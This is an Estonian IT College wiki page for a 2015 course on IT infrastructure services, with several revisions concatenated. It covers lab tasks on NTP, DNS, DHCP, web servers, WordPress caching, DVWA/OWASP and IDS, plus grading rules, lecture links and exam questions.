* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-20T05:56:49Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

[[iodine]]

[[fabric]]

[[mpstat]]

[[arpwatch]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-20T05:56:12Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

